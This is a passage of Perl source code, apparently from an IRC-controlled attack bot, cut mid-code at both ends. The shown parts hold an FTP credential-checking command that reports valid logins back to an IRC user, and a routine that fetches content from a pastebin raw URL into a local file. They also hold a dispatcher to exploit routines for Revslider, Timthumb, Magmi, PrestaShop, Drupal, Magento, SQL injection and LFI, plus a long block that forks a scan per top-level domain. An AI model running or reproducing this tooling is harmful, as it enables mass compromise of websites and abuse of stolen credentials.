/^!ftp\s+(.+?)\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($host,$user,$pass) = ($1,$2,$3); &msg("$path","9,1[4!9]FTP 4<9=4>4 Checking $host | $user:$pass"); my $success = 1; use Net::FTP; my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($user,$pass); $ftp->quit; if ($success == 0) { ¬ice("$nick","4 [9FTP4] [ 9http://".$host." 4] [".$user.":".$pass."4] 9Success "); } else { ¬ice("$nick","4 [9FTP4] [ 9http://".$host." 4] [".$user.":".$pass."4] 4Denied "); } } } } } } for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line = $line_temp.$line if ($line_temp); $line_temp = ''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } } } sub belikukis { my $kue = &get_content("http://pastebin.com/raw/YY9mrsr2"); open (FILE,">kue.txt"); print FILE $kue; close FILE; } ################################################################################## sub type() { my ($chan,$bug,$dork,$engine,$type) = @_; if ($type == 1){$type=&revslider_exploit($chan,$bug,$dork,$engine);} if ($type == 2){$type=&tim_exploit($chan,$dork,$engine);} if ($type == 3){$type=&magmi_exploit($chan,$bug,$dork,$engine);} if ($type == 4){$type=&wh_exploit($chan,$bug,$dork,$engine);} if ($type == 5){$type=&sql_exploit($chan,$bug,$dork,$engine);} if ($type == 6){$type=&presta_exploit($chan,$bug,$dork,$engine);} if ($type == 7){$type=&presta2_exploit($chan,$bug,$dork,$engine);} if ($type == 8){$type=&dolphin_exploit($chan,$bug,$dork,$engine);} if ($type == 9){$type=&testi_exploit($chan,$bug,$dork,$engine);} if ($type == 10){$type=&mmfc_exploit($chan,$bug,$dork,$engine);} if ($type == 11){$type=&lfi_exploit($chan,$bug,$dork,$engine);} if ($type == 12){$type=&tim_exploit2($chan,$bug,$dork,$engine);} if ($type == 13){$type=&dz_exploit($chan,$bug,$dork,$engine);} if ($type == 14){$type=&mjs_exploit($chan,$bug,$dork,$engine);} if ($type == 21){$type=&dru_exploit($chan,$dork,$engine);} if ($type == 89){$type=&magento_xpl($chan,$dork,$engine);} } ################################################################################## sub se_start() { my ($chan,$bug,$dork,$engine,$type) = @_; if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLe",$type); } exit; } } if ($engine =~ /net/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NET",$type); } exit; } } if ($engine =~ /com/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"COM",$type); } exit; } } if ($engine =~ /org/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ORG",$type); } exit; } } if ($engine =~ /info/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"INFO",$type); } exit; } } if ($engine =~ /edu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"EDU",$type); } exit; } } if ($engine =~ /biz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BIZ",$type); } exit; } } if ($engine =~ /pro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PRO",$type); } exit; } } if ($engine =~ /name/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NAME",$type); } exit; } } if ($engine =~ /cat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CAT",$type); } exit; } } if ($engine =~ /mobi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MOBI",$type); } exit; } } if ($engine =~ /asia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ASIA",$type); } exit; } } if ($engine =~ /coop/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"COOP",$type); } exit; } } if ($engine =~ /tel/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TEL",$type); } exit; } } if ($engine =~ /mil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MIL",$type); } exit; } } if ($engine =~ /travel/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TRAVEL",$type); } exit; } } if ($engine =~ /museum/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MUSEUM",$type); } exit; } } if ($engine =~ /gov/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GOV",$type); } exit; } } if ($engine =~ /life/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LIFE",$type); } exit; } } if ($engine =~ /AC/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AC",$type); } exit; } } if ($engine =~ /AD/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AD",$type); } exit; } } if ($engine =~ /AE/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AE",$type); } exit; } } if ($engine =~ /AF/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AF",$type); } exit; } } if ($engine =~ /AG/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AG",$type); } exit; } } if ($engine =~ /AI/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AI",$type); } exit; } } if ($engine =~ /AL/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AL",$type); } exit; } } if ($engine =~ /AM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AM",$type); } exit; } } if ($engine =~ /AN/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AN",$type); } exit; } } if ($engine =~ /AO/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AO",$type); } exit; } } if ($engine =~ /AQ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AQ",$type); } exit; } } if ($engine =~ /AR/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AR",$type); } exit; } } if ($engine =~ /AS/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AS",$type); } exit; } } if ($engine =~ /AT/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AT",$type); } exit; } } if ($engine =~ /AU/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AU",$type); } exit; } } if ($engine =~ /AW/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AW",$type); } exit; } } if ($engine =~ /AX/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AX",$type); } exit; } } if ($engine =~ /AZ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AZ",$type); } exit; } } if ($engine =~ /BA/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BA",$type); } exit; } } if ($engine =~ /BB/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BB",$type); } exit; } } if ($engine =~ /BD/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BD",$type); } exit; } } if ($engine =~ /BE/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BE",$type); } exit; } } if ($engine =~ /BF/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BF",$type); } exit; } } if ($engine =~ /BG/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BG",$type); } exit; } } if ($engine =~ /BH/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BH",$type); } exit; } } if ($engine =~ /BI/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BI",$type); } exit; } } if ($engine =~ /BJ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BJ",$type); } exit; } } if ($engine =~ /BM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BM",$type); } exit; } } if ($engine =~ /BN/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BN",$type); } exit; } } if ($engine =~ /BO/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BO",$type); } exit; } } if ($engine =~ /BQ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BQ",$type); } exit; } } if ($engine =~ /BR/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BR",$type); } exit; } } if ($engine =~ /BS/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BS",$type); } exit; } } if ($engine =~ /BT/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BT",$type); } exit; } } if ($engine =~ /BV/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BV",$type); } exit; } } if ($engine =~ /BW/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BW",$type); } exit; } } if ($engine =~ /BY/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BY",$type); } exit; } } if ($engine =~ /BZ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BZ",$type); } exit; } } if ($engine =~ /CA/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CA",$type); } exit; } } if ($engine =~ /CC/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CC",$type); } exit; } } if ($engine =~ /CD/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CD",$type); } exit; } } if ($engine =~ /CF/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CF",$type); } exit; } } if ($engine =~ /CG/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CG",$type); } exit; } } if ($engine =~ /CH/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CH",$type); } exit; } } if ($engine =~ /CI/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CI",$type); } exit; } } if ($engine =~ /CK/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CK",$type); } exit; } } if ($engine =~ /CL/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CL",$type); } exit; } } if ($engine =~ /CM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CM",$type); } exit; } } if ($engine =~ /CN/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CN",$type); } exit; } } if ($engine =~ /CO/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CO",$type); } exit; } } if ($engine =~ /CR/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CR",$type); } exit; } } if ($engine =~ /CU/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CU",$type); } exit; } } if ($engine =~ /CV/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CV",$type); } exit; } } if ($engine =~ /CW/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CW",$type); } exit; } } if ($engine =~ /CX/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CX",$type); } exit; } } if ($engine =~ /CY/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CY",$type); } exit; } } if ($engine =~ /CZ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CZ",$type); } exit; } } if ($engine =~ /DE/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DE",$type); } exit; } } if ($engine =~ /DJ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DJ",$type); } exit; } } if ($engine =~ /DK/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DK",$type); } exit; } } if ($engine =~ /DM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DM",$type); } exit; } } if ($engine =~ /DO/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DO",$type); } exit; } } if ($engine =~ /DZ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DZ",$type); } exit; } } if ($engine =~ /EC/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"EC",$type); } exit; } } if ($engine =~ /EE/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"EE",$type); } exit; } } if ($engine =~ /EG/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"EG",$type); } exit; } } if ($engine =~ /EH/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"EH",$type); } exit; } } if ($engine =~ /ER/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ER",$type); } exit; } } if ($engine =~ /ES/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ES",$type); } exit; } } if ($engine =~ /ET/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ET",$type); } exit; } } if ($engine =~ /EU/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"EU",$type); } exit; } } if ($engine =~ /FI/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"FI",$type); } exit; } } if ($engine =~ /FJ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"FJ",$type); } exit; } } if ($engine =~ /FK/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"FK",$type); } exit; } } if ($engine =~ /FM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"FM",$type); } exit; } } if ($engine =~ /FO/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"FO",$type); } exit; } } if ($engine =~ /FR/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"FR",$type); } exit; } } if ($engine =~ /GA/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GA",$type); } exit; } } if ($engine =~ /GB/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GB",$type); } exit; } } if ($engine =~ /GD/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GD",$type); } exit; } } if ($engine =~ /GE/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GE",$type); } exit; } } if ($engine =~ /GF/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GF",$type); } exit; } } if ($engine =~ /GG/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GG",$type); } exit; } } if ($engine =~ /GH/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GH",$type); } exit; } } if ($engine =~ /GI/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GI",$type); } exit; } } if ($engine =~ /GL/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GL",$type); } exit; } } if ($engine =~ /GM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GM",$type); } exit; } } if ($engine =~ /GN/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GN",$type); } exit; } } if ($engine =~ /GP/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GP",$type); } exit; } } if ($engine =~ /GQ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GQ",$type); } exit; } } if ($engine =~ /GR/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GR",$type); } exit; } } if ($engine =~ /GS/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GS",$type); } exit; } } if ($engine =~ /GT/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GT",$type); } exit; } } if ($engine =~ /GU/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GU",$type); } exit; } } if ($engine =~ /GW/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GW",$type); } exit; } } if ($engine =~ /GY/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GY",$type); } exit; } } if ($engine =~ /HK/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HK",$type); } exit; } } if ($engine =~ /HM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HM",$type); } exit; } } if ($engine =~ /HN/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HN",$type); } exit; } } if ($engine =~ /HR/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HR",$type); } exit; } } if ($engine =~ /HT/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HT",$type); } exit; } } if ($engine =~ /HU/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HU",$type); } exit; } } if ($engine =~ /ID/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ID",$type); } exit; } } if ($engine =~ /IE/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IE",$type); } exit; } } if ($engine =~ /IL/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IL",$type); } exit; } } if ($engine =~ /IM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IM",$type); } exit; } } if ($engine =~ /IN/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IN",$type); } exit; } } if ($engine =~ /IO/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IO",$type); } exit; } } if ($engine =~ /IQ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IQ",$type); } exit; } } if ($engine =~ /IR/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IR",$type); } exit; } } if ($engine =~ /IS/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IS",$type); } exit; } } if ($engine =~ /IT/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IT",$type); } exit; } } if ($engine =~ /JE/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JE",$type); } exit; } } if ($engine =~ /JM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JM",$type); } exit; } } if ($engine =~ /JO/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JO",$type); } exit; } } if ($engine =~ /JP/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JP",$type); } exit; } } if ($engine =~ /KE/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KE",$type); } exit; } } if ($engine =~ /KG/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KG",$type); } exit; } } if ($engine =~ /KH/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KH",$type); } exit; } } if ($engine =~ /KI/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KI",$type); } exit; } } if ($engine =~ /KM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KM",$type); } exit; } } if ($engine =~ /KN/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KN",$type); } exit; } } if ($engine =~ /KP/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KP",$type); } exit; } } if ($engine =~ /KR/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KR",$type); } exit; } } if ($engine =~ /KW/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KW",$type); } exit; } } if ($engine =~ /KY/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KY",$type); } exit; } } if ($engine =~ /KZ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KZ",$type); } exit; } } if ($engine =~ /LA/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LA",$type); } exit; } } if ($engine =~ /LB/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LB",$type); } exit; } } if ($engine =~ /LC/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LC",$type); } exit; } } if ($engine =~ /LI/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LI",$type); } exit; } } if ($engine =~ /LK/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LK",$type); } exit; } } if ($engine =~ /LR/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LR",$type); } exit; } } if ($engine =~ /LS/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LS",$type); } exit; } } if ($engine =~ /LT/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LT",$type); } exit; } } if ($engine =~ /LU/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LU",$type); } exit; } } if ($engine =~ /LV/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LV",$type); } exit; } } if ($engine =~ /LY/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LY",$type); } exit; } } if ($engine =~ /MA/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MA",$type); } exit; } } if ($engine =~ /MC/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MC",$type); } exit; } } if ($engine =~ /MD/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MD",$type); } exit; } } if ($engine =~ /ME/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ME",$type); } exit; } } if ($engine =~ /MG/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MG",$type); } exit; } } if ($engine =~ /MH/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MH",$type); } exit; } } if ($engine =~ /MK/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MK",$type); } exit; } } if ($engine =~ /ML/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ML",$type); } exit; } } if ($engine =~ /MM/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MM",$type); } exit; } } if ($engine =~ /MN/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MN",$type); } exit; } } if ($engine =~ /MO/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MO",$type); } exit; } } if ($engine =~ /MP/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MP",$type); } exit; } } if ($engine =~ /MQ/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MQ",$type); } exit; } } if ($engine =~ /MR/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MR",$type); } exit; } } if ($engine =~ /MS/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MS",$type); } exit; } } if ($engine =~ /MT/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MT",$type); } exit; } } if ($engine =~ /MU/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MU",$type); } exit; } } if ($engine =~ /MV/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MV",$type); } exit; } } if ($engine =~ /MW/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; 